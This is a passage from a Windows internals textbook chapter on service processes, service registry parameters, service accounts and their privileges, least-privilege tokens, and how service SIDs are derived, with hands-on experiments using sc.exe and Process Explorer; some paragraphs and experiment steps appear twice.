StartService function. Because some service-based applications also must initialize during the boot
process to function, it’s not unusual for a setup program to register a service as an autostart service,
ask the user to reboot the system to complete an installation, and let the SCM start the service as the
system boots.
When a program calls CreateService, it must specify a number of parameters describing the service’s
characteristics. The characteristics include the service’s type (whether it’s a service that runs in its own
process rather than a service that shares a process with other services), the location of the service’s
executable image file, an optional display name, an optional account name and password used to start
the service in a particular account’s security context, a start type that indicates whether the service
starts automatically when the system boots or manually under the direction of an SCP, an error code
that indicates how the system should react if the service detects an error when starting, and, if the
service starts automatically, optional information that specifies when the service starts relative to other
services. While delay-loaded services are supported since Windows Vista, Windows 7 introduced sup-
port for Triggered services, which are started or stopped when one or more specific events are verified.
An SCP can specify trigger event information through the ChangeServiceConfig2 API.
A service application runs in a service process. A service process can host one or more service
applications. When the SCM starts a service process, the process must immediately invoke the
StartServiceCtrlDispatcher function (before a well-defined timeout expires—see the “Service logon”
section for more details). StartServiceCtrlDispatcher accepts a list of entry points into services, with one
entry point for each service in the process. Each entry point is identified by the name of the service
the entry point corresponds to. After making a local RPC (ALPC) communications connection to the
SCM (which acts as a pipe), StartServiceCtrlDispatcher waits in a loop for commands to come through
the pipe from the SCM. Note that the handle of the connection is saved by the SCM in an internal
428
CHAPTER 10 Management, diagnostics, and tracing
list, which is used for sending and receiving service commands to the right process. The SCM sends
a service-start command each time it starts a service the process owns. For each start command it
receives, the StartServiceCtrlDispatcher function creates a thread, called a service thread, to invoke
the starting service’s entry point (Service Main) and implement the command loop for the service.
StartServiceCtrlDispatcher waits indefinitely for commands from the SCM and returns control to the
process’s main function only when all the process’s services have stopped, allowing the service process
to clean up resources before exiting.
A service entry point’s (ServiceMain) first action is to call the RegisterServiceCtrlHandler function.
This function receives and stores a pointer to a function, called the control handler, which the ser-
vice implements to handle various commands it receives from the SCM. RegisterServiceCtrlHandler
doesn’t communicate with the SCM, but it stores the function in local process memory for the
StartServiceCtrlDispatcher function. The service entry point continues initializing the service, which can
include allocating memory, creating communications end points, and reading private configuration
data from the registry. As explained earlier, a convention most services follow is to store their param-
eters under a subkey of their service registry key, named Parameters.
While the entry point is initializing the service, it must periodically send status messages, using the
SetServiceStatus function, to the SCM indicating how the service’s startup is progressing. After the
entry point finishes initialization (the service indicates this to the SCM through the SERVICE_RUNNING
status), a service thread usually sits in a loop waiting for requests from client applications. For example,
a web server would initialize a TCP listen socket and wait for inbound HTTP connection requests.
A service process’s main thread, which executes in the StartServiceCtrlDispatcher function, receives
SCM commands directed at services in the process and invokes the target service’s control handler
function (stored by RegisterServiceCtrlHandler). SCM commands include stop, pause, resume, interro-
gate, and shutdown or application-defined commands. Figure 10-8 shows the internal organization of
a service process—the main thread and the service thread that make up a process hosting one service.
Main
StartServiceCtrlDispatcher
Service control handler
Pipe to
SCM
3
RegisterServiceCtrlHandler
Initialize
Process client requests
1
3
Main thread
Service thread
1. StartServiceCtrlDispatcher launches service thread.
2. Service thread registers control handler.
3. StartServiceCtrlDispatcher calls handlers in response to SCM commands.
4. Service thread processes client requests.
Connections to
service clients
4
2
FIGURE 10-8 Inside a service process.
CHAPTER 10 Management, diagnostics, and tracing
429
Service characteristics
The SCM stores each characteristic as a value in the service’s registry key. Figure 10-9 shows an example
of a service registry key.
FIGURE 10-9 Example of a service registry key.
Table 10-7 lists all the service characteristics, many of which also apply to device drivers. (Not every
characteristic applies to every type of service or device driver.)
Note The SCM does not access a service’s Parameters subkey until the service is deleted,
at which time the SCM deletes the service’s entire key, including subkeys like Parameters.
TABLE 10-7 Service and Driver Registry Parameters
Value Setting
Value Name
Value Setting Description
Start
SERVICE_BOOT_START (0x0)
Winload preloads the driver so that it is in memory dur-
ing the boot. These drivers are initialized just prior to
SERVICE_SYSTEM_START drivers.
SERVICE_SYSTEM_START (0x1)
The driver loads and initializes during kernel initializa-
tion after SERVICE_BOOT_START drivers have initialized.
SERVICE_AUTO_START (0x2)
The SCM starts the driver or service after the SCM pro-
cess, Services.exe, starts.
SERVICE_DEMAND_START (0x3)
The SCM starts the driver or service on demand (when a
client calls StartService on it, it is trigger started, or when
another starting service is dependent on it.)
SERVICE_DISABLED (0x4)
The driver or service cannot be loaded or initialized.
430
CHAPTER 10 Management, diagnostics, and tracing
Value Setting
Value Name
Value Setting Description
ErrorControl
SERVICE_ERROR_IGNORE (0x0)
Any error the driver or service returns is ignored, and no
warning is logged or displayed.
SERVICE_ERROR_NORMAL (0x1)
If the driver or service reports an error, an event log
message is written.
SERVICE_ERROR_SEVERE (0x2)
If the driver or service returns an error and last known
good isn’t being used, reboot into last known good;
otherwise, log an event message.
SERVICE_ERROR_CRITICAL (0x3)
If the driver or service returns an error and last known
good isn’t being used, reboot into last known good;
otherwise, log an event message.
Type
SERVICE_KERNEL_DRIVER (0x1)
Device driver.
SERVICE_FILE_SYSTEM_DRIVER (0x2)
Kernel-mode file system driver.
SERVICE_ADAPTER (0x4)
Obsolete.
SERVICE_RECOGNIZER_DRIVER (0x8)
File system recognizer driver.
SERVICE_WIN32_OWN_PROCESS
(0x10)
The service runs in a process that hosts only one service.
SERVICE_WIN32_SHARE_PROCESS
(0x20)
The service runs in a process that hosts multiple services.
SERVICE_USER_OWN_PROCESS
(0x50)
The service runs with the security token of the logged-in
user in its own process.
SERVICE_USER_SHARE_PROCESS
(0x60)
The service runs with the security token of the logged-in
user in a process that hosts multiple services.
SERVICE_INTERACTIVE_PROCESS
(0x100)
The service is allowed to display windows on the console
and receive user input, but only on the console session
(0) to prevent interacting with user/console applications
on other sessions. This option is deprecated.
Group
Group name
The driver or service initializes when its group is
initialized.
Tag
Tag number
The specified location in a group initialization order. This
parameter doesn’t apply to services.
ImagePath
Path to the service or driver execut-
able file
If ImagePath isn’t specified, the I/O manager looks for
drivers in %SystemRoot%\System32\Drivers. Required
for Windows services.
DependOnGroup
Group name
The driver or service won’t load unless a driver or service
from the specified group loads.
DependOnService
Service name
The service won’t load until after the specified service
loads. This parameter doesn’t apply to device drivers or
services with a start type different than SERVICE_AUTO_
START or SERVICE_DEMAND_START.
ObjectName
Usually LocalSystem, but it can
be an account name, such as .\
Administrator
Specifies the account in which the service will run. If
ObjectName isn’t specified, LocalSystem is the account
used. This parameter doesn’t apply to device drivers.
DisplayName
Name of the service
The service application shows services by this name. If
no name is specified, the name of the service’s registry
key becomes its name.
CHAPTER 10 Management, diagnostics, and tracing
431
Value Setting
Value Name
Value Setting Description
DeleteFlag
0 or 1 (TRUE or FALSE)
Temporary flag set by the SCM when a service is marked
to be deleted.
Description
Description of service
Up to 32,767-byte description of the service.
FailureActions
Description of actions the SCM
should take when the service process
exits unexpectedly
Failure actions include restarting the service process,
rebooting the system, and running a specified program.
This value doesn’t apply to drivers.
FailureCommand
Program command line
The SCM reads this value only if FailureActions specifies
that a program should execute upon service failure. This
value doesn’t apply to drivers.
DelayedAutoStart
0 or 1 (TRUE or FALSE)
Tells the SCM to start this service after a certain delay
has passed since the SCM was started. This reduces
the number of services starting simultaneously during
startup.
PreshutdownTimeout
Timeout in milliseconds
This value allows services to override the default pre-
shutdown notification timeout of 180 seconds. After this
timeout, the SCM performs shutdown actions on the
service if it has not yet responded.
ServiceSidType
SERVICE_SID_TYPE_NONE (0x0)
Backward-compatibility setting.
SERVICE_SID_TYPE_UNRESTRICTED
(0x1)
The SCM adds the service SID as a group owner to the
service process’s token when it is created.
SERVICE_SID_TYPE_RESTRICTED
(0x3)
The SCM runs the service with a write-restricted token,
adding the service SID to the restricted SID list of the
service process, along with the world, logon, and write-
restricted SIDs.
Alias
String
Name of the service’s alias.
RequiredPrivileges
List of privileges
This value contains the list of privileges that the service
requires to function. The SCM computes their union
when creating the token for the shared process related
to this service, if any.
Security
Security descriptor
This value contains the optional security descriptor that
defines who has what access to the service object cre-
ated internally by the SCM. If this value is omitted, the
SCM applies a default security descriptor.
LaunchProtected
SERVICE_LAUNCH_PROTECTED_
NONE (0x0)
The SCM launches the service unprotected (default value).
SERVICE_LAUNCH_PROTECTED_
WINDOWS (0x1)
The SCM launches the service in a Windows protected
process.
SERVICE_LAUNCH_PROTECTED_
WINDOWS_ LIGHT (0x2)
The SCM launches the service in a Windows protected
process light.
SERVICE_LAUNCH_PROTECTED_
ANTIMALWARE_LIGHT (0x3)
The SCM launches the service in an Antimalware pro-
tected process light.
SERVICE_LAUNCH_PROTECTED_
APP_LIGHT (0x4)
The SCM launches the service in an App protected pro-
cess light (internal only).
432
CHAPTER 10 Management, diagnostics, and tracing
Value Setting
Value Name
Value Setting Description
UserServiceFlags
USER_SERVICE_FLAG_DSMA_ALLOW
(0x1)
Allow the default user to start the user service.
USER_SERVICE_FLAG_NONDSMA_
ALLOW (0x2)
Do not allow the default user to start the service.
SvcHostSplitDisable
0 or 1 (TRUE or FALSE)
When set to, 1 prohibits the SCM to enable Svchost split-
ting. This value applies only to shared services.
PackageFullName
String
Package full name of a packaged service.
AppUserModelId
String
Application user model ID (AUMID) of a packaged service.
PackageOrigin
PACKAGE_ORIGIN_UNSIGNED (0x1)
PACKAGE_ORIGIN_INBOX (0x2)
PACKAGE_ORIGIN_STORE (0x3)
PACKAGE_ORIGIN_DEVELOPER_
UNSIGNED (0x4)
PACKAGE_ORIGIN_DEVELOPER_
SIGNED (0x5)
These values identify the origin of the AppX package
(the entity that has created it).
Notice that Type values include three that apply to device drivers: device driver, file system driver,
and file system recognizer. These are used by Windows device drivers, which also store their param-
eters as registry data in the Services registry key. The SCM is responsible for starting non-PNP driv-
ers with a Start value of SERVICE_AUTO_START or SERVICE_DEMAND_START, so it’s natural for the
SCM database to include drivers. Services use the other types, SERVICE_WIN32_OWN_PROCESS and
SERVICE_WIN32_SHARE_PROCESS, which are mutually exclusive.
An executable that hosts just one service uses the SERVICE_WIN32_OWN_PROCESS type. In a
similar way, an executable that hosts multiple services specifies the SERVICE_WIN32_SHARE_PROCESS.
Hosting multiple services in a single process saves system resources that would otherwise be consumed
as overhead when launching multiple service processes. A potential disadvantage is that if one of the
services of a collection running in the same process causes an error that terminates the process, all the
services of that process terminate. Also, another limitation is that all the services must run under the
same account (however, if a service takes advantage of service security hardening mechanisms, it can
limit some of its exposure to malicious attacks). The SERVICE_USER_SERVICE flag is added to denote a
user service, which is a type of service that runs with the identity of the currently logged-on user
Trigger information is normally stored by the SCM under another subkey named TriggerInfo.
Each trigger event is stored in a child key named as the event index, starting from 0 (for example,
the third trigger event is stored in the “TriggerInfo2” subkey). Table 10-8 lists all the possible registry
values that compose the trigger information.
CHAPTER 10 Management, diagnostics, and tracing
433
TABLE 10-8 Triggered services registry parameters
Value Setting
Value Name
Value Setting Description
Action
SERVICE_TRIGGER_ACTION_
SERVICE_ START (0x1)
Start the service when the trigger event occurs.
SERVICE_TRIGGER_ACTION_
SERVICE_ STOP (0x2)
Stop the service when the trigger event occurs.
Type
SERVICE_TRIGGER_TYPE_DEVICE_
INTERFACE_ARRIVAL (0x1)
Specifies an event triggered when a device of the speci-
fied device interface class arrives or is present when the
system starts.
SERVICE_TRIGGER_TYPE_IP_
ADDRESS_AVAILABILITY (0x2)
Specifies an event triggered when an IP address be-
comes available or unavailable on the network stack.
SERVICE_TRIGGER_TYPE_DOMAIN_
JOIN (0x3)
Specifies an event triggered when the computer joins or
leaves a domain.
SERVICE_TRIGGER_TYPE_FIREWALL_
PORT_EVENT (0x4)
Specifies an event triggered when a firewall port is
opened or closed.
SERVICE_TRIGGER_TYPE_GROUP_
POLICY (0x5)
Specifies an event triggered when a machine or user
policy change occurs.
SERVICE_TRIGGER_TYPE_NETWORK_
ENDPOINT (0x6)
Specifies an event triggered when a packet or request
arrives on a particular network protocol.
SERVICE_TRIGGER_TYPE_CUSTOM
(0x14)
Specifies a custom event generated by an ETW provider.
Guid
Trigger subtype GUID
A GUID that identifies the trigger event subtype. The
GUID depends on the Trigger type.
DataIndex
Trigger-specific data
Trigger-specific data for the service trigger event. This
value depends on the trigger event type.
DataTypeIndex
SERVICE_TRIGGER_DATA_TYPE_
BINARY (0x1)
The trigger-specific data is in binary format.
SERVICE_TRIGGER_DATA_TYPE_
STRING (0x2)
The trigger-specific data is in string format.
SERVICE_TRIGGER_DATA_TYPE_
LEVEL (0x3)
The trigger-specific data is a byte value.
SERVICE_TRIGGER_DATA_TYPE_
KEYWORD_ANY (0x4)
The trigger-specific data is a 64-bit (8 bytes) unsigned
integer value.
SERVICE_TRIGGER_DATA_TYPE_
KEYWORD_ALL (0x5)
The trigger-specific data is a 64-bit (8 bytes) unsigned
integer value.
Service accounts
The security context of a service is an important consideration for service developers as well as for system
administrators because it dictates which resource the process can access. Most built-in services run in the
security context of an appropriate Service account (which has limited access rights, as described in the
following subsections). When a service installation program or the system administrator creates a service,
it usually specifies the security context of the local system account (displayed sometimes as SYSTEM and
other times as LocalSystem), which is very powerful. Two other built-in accounts are the network service
and local service accounts. These accounts have fewer capabilities than the local system account from a se-
curity standpoint. The following subsections describe the special characteristics of all the service accounts.
434
CHAPTER 10 Management, diagnostics, and tracing
The local system account
The local system account is the same account in which core Windows user-mode operating system com-
ponents run, including the Session Manager (%SystemRoot%\System32\Smss.exe), the Windows subsys-
tem process (Csrss.exe), the Local Security Authority process (%SystemRoot%\System32\Lsass.exe), and
the Logon process (%SystemRoot%\System32\Winlogon.exe). For more information on these processes,
see Chapter 7 in Part 1.
From a security perspective, the local system account is extremely powerful—more powerful than
any local or domain account when it comes to security ability on a local system. This account has the
following characteristics:
I
It is a member of the local Administrators group. Table 10-9 shows the groups to which the local
system account belongs. (See Chapter 7 in Part 1 for information on how group membership is
used in object access checks.)
I
It has the right to enable all privileges (even privileges not normally granted to the local ad-
ministrator account, such as creating security tokens). See Table 10-10 for the list of privileges
assigned to the local system account. (Chapter 7 in Part 1 describes the use of each privilege.)
I
Most files and registry keys grant full access to the local system account. Even if they don’t grant
full access, a process running under the local system account can exercise the take-ownership
privilege to gain access.
I
Processes running under the local system account run with the default user profile (HKU\.
DEFAULT). Therefore, they can’t directly access configuration information stored in the user
profiles of other accounts (unless they explicitly use the LoadUserProfile API).
I
When a system is a member of a Windows domain, the local system account includes the ma-
chine security identifier (SID) for the computer on which a service process is running. Therefore,
a service running in the local system account will be automatically authenticated on other
machines in the same forest by using its computer account. (A forest is a grouping of domains.)
I
Unless the machine account is specifically granted access to resources (such as network shares,
named pipes, and so on), a process can access network resources that allow null sessions—that
is, connections that require no credentials. You can specify the shares and pipes on a particular
computer that permit null sessions in the NullSessionPipes and NullSessionShares registry values
under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters.
TABLE 10-9 Service account group membership (and integrity level)
Local System
Network Service
Local Service
Service Account
Administrators
Everyone
Authenticated users
System integrity level
Everyone
Users
Authenticated users
Local
Network service
Console logon
System integrity level
Everyone
Users
Authenticated users
Local
Local service
Console logon
UWP capabilities groups
System integrity level
Everyone
Users
Authenticated users
Local
Local service
All services
Write restricted
Console logon
High integrity Level
CHAPTER 10 Management, diagnostics, and tracing
435
TABLE 10-10 Service account privileges
Local System
Local Service / Network Service
Service Account
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
SeRelabelPrivilege
SeUndockPrivilege (client only)
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeSystemtimePrivilege
SeTimeZonePrivilege
SeUndockPrivilege (client only)
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
The network service account
The network service account is intended for use by services that want to authenticate to other ma-
chines on the network using the computer account, as does the local system account, but do not have
the need for membership in the Administrators group or the use of many of the privileges assigned to
the local system account. Because the network service account does not belong to the Administrators
group, services running in the network service account by default have access to far fewer registry keys,
file system folders, and files than the services running in the local system account. Further, the assign-
ment of few privileges limits the scope of a compromised network service process. For example, a pro-
cess running in the network service account cannot load a device driver or open arbitrary processes.
Another difference between the network service and local system accounts is that processes run-
ning in the network service account use the network service account’s profile. The registry component
of the network service profile loads under HKU\S-1-5-20, and the files and directories that make up the
component reside in %SystemRoot%\ServiceProfiles\NetworkService.
A service that runs in the network service account is the DNS client, which is responsible for resolv-
ing DNS names and for locating domain controllers.
436
CHAPTER 10 Management, diagnostics, and tracing
The local service account
The local service account is virtually identical to the network service account with the important dif-
ference that it can access only network resources that allow anonymous access. Table 10-10 shows that
the network service account has the same privileges as the local service account, and Table 10-9 shows
that it belongs to the same groups with the exception that it belongs to the local service group instead
of the network service group. The profile used by processes running in the local service loads into
HKU\S-1-5-19 and is stored in %SystemRoot%\ServiceProfiles\LocalService.
Examples of services that run in the local service account include the Remote Registry Service, which
allows remote access to the local system’s registry, and the LmHosts service, which performs NetBIOS
name resolution.
Running services in alternate accounts
Because of the restrictions just outlined, some services need to run with the security credentials of a
user account. You can configure a service to run in an alternate account when the service is created or
by specifying an account and password that the service should run under with the Windows Services
MMC snap-in. In the Services snap-in, right-click a service and select Properties, click the Log On tab,
and select the This Account option, as shown in Figure 10-10.
Note that when required to start, a service running with an alternate account is always launched us-
ing the alternate account credentials, even though the account is not currently logged on. This means
that the user profile is loaded even though the user is not logged on. User Services, which are described
later in this chapter (in the “User services” section), have also been designed to overcome this problem.
They are loaded only when the user logs on.
FIGURE 10-10 Service account settings.
CHAPTER 10 Management, diagnostics, and tracing
437
Running with least privilege
A service’s process typically is subject to an all-or-nothing model, meaning that all privileges available
to the account the service process is running under are available to a service running in the process that
might require only a subset of those privileges. To better conform to the principle of least privilege, in
which Windows assigns services only the privileges they require, developers can specify the privileges
their service requires, and the SCM creates a security token that contains only those privileges.
Service developers use the ChangeServiceConfig2 API (specifying the SERVICE_CONFIG_REQUIRED_
PRIVILEGES _INFO information level) to indicate the list of privileges they desire. The API saves that
information in the registry into the RequiredPrivileges value of the root service key (refer to Table 10-7).
When the service starts, the SCM reads the key and adds those privileges to the token of the process in
which the service is running.
If there is a RequiredPrivileges value and the service is a stand-alone service (running as a dedicated
process), the SCM creates a token containing only the privileges that the service needs. For services
running as part of a shared service process (as are a subset of services that are part of Windows) and
specifying required privileges, the SCM computes the union of those privileges and combines them
for the service-hosting process’s token. In other words, only the privileges not specified by any of the
services that are hosted in the same service process will be removed. In the case in which the registry
value does not exist, the SCM has no choice but to assume that the service is either incompatible with
least privileges or requires all privileges to function. In this case, the full token is created, containing all
privileges, and no additional security is offered by this model. To strip almost all privileges, services can
specify only the Change Notify privilege.
Note The privileges a service specifies must be a subset of those that are available to the
service account in which it runs.
EXPERIMENT: Viewing privileges required by services
You can view the privileges a service requires with the Service Control utility, sc.exe, and the
qprivs option. Additionally, Process Explorer can show you information about the security token
of any service process on the system, so you can compare the information returned by sc.exe
with the privileges part of the token. The following steps show you how to do this for some of the
best locked-down services on the system.
1.
Use sc.exe to look at the required privileges specified by CryptSvc by typing the follow-
ing into a command prompt:
sc qprivs cryptsvc
You should see three privileges being requested: the SeChangeNotifyPrivilege,
SeCreateGlobalPrivilege, and the SeImpersonatePrivilege.
EXPERIMENT: Viewing privileges required by services
You can view the privileges a service requires with the Service Control utility, sc.exe, and the
qprivs option. Additionally, Process Explorer can show you information about the security token
of any service process on the system, so you can compare the information returned by sc.exe
with the privileges part of the token. The following steps show you how to do this for some of the
best locked-down services on the system.
1.
Use sc.exe to look at the required privileges specified by CryptSvc by typing the follow-
ing into a command prompt:
sc qprivs cryptsvc
You should see three privileges being requested: the SeChangeNotifyPrivilege,
SeCreateGlobalPrivilege, and the SeImpersonatePrivilege.
438
CHAPTER 10 Management, diagnostics, and tracing
2.
Run Process Explorer as administrator and look at the process list.
You should see multiple Svchost.exe processes that are hosting the services on your
machine (in case Svchost splitting is enabled, the number of Svchost instances are even
more). Process Explorer highlights these in pink.
3.
CryptSvc is a service that runs in a shared hosting process. In Windows 10, locat-
ing the correct process instance is easily achievable through Task Manager. You do
not need to know the name of the Service DLL, which is listed in the HKLM\SYSTEM\
CurrentControlSet\Services\CryptSvc \Parameters registry key.
4.
Open Task Manager and look at the Services tab. You should easily find the PID of the
CryptSvc hosting process.
5.
Return to Process Explorer and double-click the Svchost.exe process that has the same
PID found by Task Manager to open the Properties dialog box.
6.
Double check that the Services tab includes the CryptSvc service. If service splitting is en-
abled, it should contain only one service; otherwise, it will contain multiple services. Then
click the Security tab. You should see security information similar to the following figure:
2.
Run Process Explorer as administrator and look at the process list.
You should see multiple Svchost.exe processes that are hosting the services on your
machine (in case Svchost splitting is enabled, the number of Svchost instances are even
more). Process Explorer highlights these in pink.
3.
CryptSvc is a service that runs in a shared hosting process. In Windows 10, locat-
ing the correct process instance is easily achievable through Task Manager. You do
not need to know the name of the Service DLL, which is listed in the HKLM\SYSTEM\
CurrentControlSet\Services\CryptSvc \Parameters registry key.
4.
Open Task Manager and look at the Services tab. You should easily find the PID of the
CryptSvc hosting process.
5.
Return to Process Explorer and double-click the Svchost.exe process that has the same
PID found by Task Manager to open the Properties dialog box.
6.
Double check that the Services tab includes the CryptSvc service. If service splitting is en-
abled, it should contain only one service; otherwise, it will contain multiple services. Then
click the Security tab. You should see security information similar to the following figure:
Security tab. You should see security information similar to the following figure:
Security
CHAPTER 10 Management, diagnostics, and tracing
439
Note that although the service is running as part of the local service account, the list of privi-
leges Windows assigned to it is much shorter than the list available to the local service account
shown in Table 10-10.
For a service-hosting process, the privileges part of the token is the union of the privileges
requested by all the services running inside it, so this must mean that services such as DnsCache
and LanmanWorkstation have not requested privileges other than the ones shown by Process
Explorer. You can verify this by running the Sc.exe tool on those other services as well (only if
Svchost Service Splitting is disabled).
Service isolation
Although restricting the privileges that a service has access to helps lessen the ability of a compromised
service process to compromise other processes, it does nothing to isolate the service from resources
that the account in which it is running has access under normal conditions. As mentioned earlier, the
local system account has complete access to critical system files, registry keys, and other securable
objects on the system because the access control lists (ACLs) grant permissions to that account.
At times, access to some of these resources is critical to a service’s operation, whereas other objects
should be secured from the service. Previously, to avoid running in the local system account to obtain
access to required resources, a service would be run under a standard user account, and ACLs would be
added on the system objects, which greatly increased the risk of malicious code attacking the system.
Another solution was to create dedicated service accounts and set specific ACLs for each account (as-
sociated to a service), but this approach easily became an administrative hassle.
Windows now combines these two approaches into a much more manageable solution: it allows
services to run in a nonprivileged account but still have access to specific privileged resources without
lowering the security of those objects. Indeed, the ACLs on an object can now set permissions directly for
a service, but not by requiring a dedicated account. Instead, Windows generates a service SID to repre-
sent a service, and this SID can be used to set permissions on resources such as registry keys and files.
The Service Control Manager uses service SIDs in different ways. If the service is configured to be
launched using a virtual service account (in the NT SERVICE\ domain), a service SID is generated and
assigned as the main user of the new service’s token. The token will also be part of the NT SERVICE\ALL
SERVICES group. This group is used by the system to allow a securable object to be accessed by any
service. In the case of shared services, the SCM creates the service-hosting processes (a process that
contains more than one service) with a token that contains the service SIDs of all services that are part
of the service group associated with the process, including services that are not yet started (there is no
way to add new SIDs after a token has been created). Restricted and unrestricted services (explained
later in this section) always have a service SID in the hosting process’s token.
Note that although the service is running as part of the local service account, the list of privi-
leges Windows assigned to it is much shorter than the list available to the local service account
shown in Table 10-10.
For a service-hosting process, the privileges part of the token is the union of the privileges
requested by all the services running inside it, so this must mean that services such as DnsCache
and LanmanWorkstation have not requested privileges other than the ones shown by Process
Explorer. You can verify this by running the Sc.exe tool on those other services as well (only if
Svchost Service Splitting is disabled).
440
CHAPTER 10 Management, diagnostics, and tracing
EXPERIMENT: Understanding Service SIDs
In Chapter 9, we presented an experiment (“Understanding the security of the VM worker pro-
cess and the virtual hard disk files”) in which we showed how the system generates VM SIDs for
different VM worker processes. Similar to the VM worker process, the system generates Service
SIDs using a well-defined algorithm. This experiment uses Process Explorer to show service SIDs
and explains how the system generates them.
First, you need to choose a service that runs with a virtual service account or under a re-
stricted/nonrestricted access token. Open the Registry Editor (by typing regedit in the Cortana
search box) and navigate to the HKLM\SYSTEM\CurrentControlSet\Services registry key. Then
select Find from the Edit menu. As discussed previously in this section, the service account is
stored in the ObjectName registry value. Unfortunately, you would not find a lot of services run-
ning in a virtual service account (those accounts begin with the NT SERVICE\ virtual domain), so it
is better if you look at a restricted token (unrestricted tokens work, too). Type ServiceSidType
(the value of which is stored whether the Service should run with a restricted or unrestricted
token) and click the Find Next button.
For this experiment, you are looking for a restricted service account (which has the
ServiceSidType value set to 3), but unrestricted services work well, too (the value is set to 1).
If the desired value does not match, you can use the F3 button to find the next service. In this
experiment, use the BFE service.
Open Process Explorer, search the BFE hosting process (refer to the previous experiment for
understanding how to find the correct one), and double-click it. Select the Security tab and click
the NT SERVICE\BFE Group (the human-readable notation of the service SID) or the service SID of
your service if you have chosen another one. Note the extended group SID, which appears under
the group list (if the service is running under a virtual service account, the service SID is instead
shown by Process Explorer in the second line of the Security Tab):
S-1-5-80-1383147646-27650227-2710666058-1662982300-1023958487
The NT authority (ID 5) is responsible for the service SIDs, generated by using the service base
RID (80) and by the SHA-1 hash of the uppercased UTF-16 Unicode string of the service name.
SHA-1 is an algorithm that produces a 160-bit (20-bytes) value. In the Windows security world,
this means that the SID will have 5 (4-bytes) sub-authority values. The SHA-1 hash of the Unicode
(UTF-16) BFE service name is:
7e 28 71 52 b3 e8 a5 01 4a 7b 91 a1 9c 18 1f 63 d7 5d 08 3d
If you divide the produced hash in five groups of eight hexadecimal digits, you will find
the following:
I
0x5271287E (first DWORD value), which equals 1383147646 in decimal (remember that
Windows is a little endian OS)
I
0x01A5E8B3 (second DWORD value), which equals 27650227 in decimal
EXPERIMENT: Understanding Service SIDs
In Chapter 9, we presented an experiment (“Understanding the security of the VM worker pro-
cess and the virtual hard disk files”) in which we showed how the system generates VM SIDs for
different VM worker processes. Similar to the VM worker process, the system generates Service
SIDs using a well-defined algorithm. This experiment uses Process Explorer to show service SIDs
and explains how the system generates them.
First, you need to choose a service that runs with a virtual service account or under a re-
stricted/nonrestricted access token. Open the Registry Editor (by typing regedit in the Cortana
search box) and navigate to the HKLM\SYSTEM\CurrentControlSet\Services registry key. Then
select Find from the Edit menu. As discussed previously in this section, the service account is
stored in the ObjectName registry value. Unfortunately, you would not find a lot of services run-
ning in a virtual service account (those accounts begin with the NT SERVICE\ virtual domain), so it
is better if you look at a restricted token (unrestricted tokens work, too). Type ServiceSidType
(the value of which is stored whether the Service should run with a restricted or unrestricted
token) and click the Find Next button.
For this experiment, you are looking for a restricted service account (which has the
ServiceSidType value set to 3), but unrestricted services work well, too (the value is set to 1).
If the desired value does not match, you can use the F3 button to find the next service. In this
experiment, use the BFE service.
Open Process Explorer, search the BFE hosting process (refer to the previous experiment for
understanding how to find the correct one), and double-click it. Select the Security tab and click
Security tab and click
Security
the NT SERVICE\BFE Group (the human-readable notation of the service SID) or the service SID of
your service if you have chosen another one. Note the extended group SID, which appears under
the group list (if the service is running under a virtual service account, the service SID is instead
shown by Process Explorer in the second line of the Security Tab):
S-1-5-80-1383147646-27650227-2710666058-1662982300-1023958487
The NT authority (ID 5) is responsible for the service SIDs, generated by using the service base
RID (80) and by the SHA-1 hash of the uppercased UTF-16 Unicode string of the service name.
SHA-1 is an algorithm that produces a 160-bit (20-bytes) value. In the Windows security world,
this means that the SID will have 5 (4-bytes) sub-authority values. The SHA-1 hash of the Unicode
(UTF-16) BFE service name is:
7e 28 71 52 b3 e8 a5 01 4a 7b 91 a1 9c 18 1f 63 d7 5d 08 3d
If you divide the produced hash in five groups of eight hexadecimal digits, you will find
the following:
I
0x5271287E (first DWORD value), which equals 1383147646 in decimal (remember that
Windows is a little endian OS)
I
0x01A5E8B3 (second DWORD value), which equals 27650227 in decimal
CHAPTER 10 Management, diagnostics, and tracing
441
I
0xA1917B4A (third DWORD value), which equals 2710666058 in decimal
I
0x631F189C (fourth DWORD value), which equals 1662982300 in decimal
I
0x3D085DD7 (fifth DWORD value), which equals 1023958487 in decimal
If you combine the numbers and add the service SID authority value and first RID (S-1-5-80),
you build the same SID shown by Process Explorer. This demonstrates how the system generates
service SIDs.
The usefulness of having a SID for each service extends beyond the mere ability to add ACL entries and
permissions for various objects on the system as a way to have fine-grained control over their access. Our
discussion initially covered the case in which certain objects on the system, accessible by a given account,
must be protected from a service running within that same account. As we’ve previously described,
service SIDs prevent that problem only by requiring that Deny entries associated with the service SID
be placed on every object that needs to be secured, which is a clearly an unmanageable approach.
To avoid requiring Deny access control entries (ACEs) as a way to prevent services from having ac-
cess to resources that the user account in which they run does have access, there are two types of ser-
vice SIDs: the restricted service SID (SERVICE_SID_TYPE_RESTRICTED) and the unrestricted service SID
(SERVICE_SID_TYPE_UNRESTRICTED), the latter being the default and the case we’ve looked at up to
now. The names are a little misleading in this case. The service SID is always generated in the same way
(see the previous experiment). It is the token of the hosting process that is generated in a different way.
Unrestricted service SIDs are created as enabled-by-default, group owner SIDs, and the process
token is also given a new ACE that provides full permission to the service logon SID, which allows the
service to continue communicating with the SCM. (A primary use of this would be to enable or disable
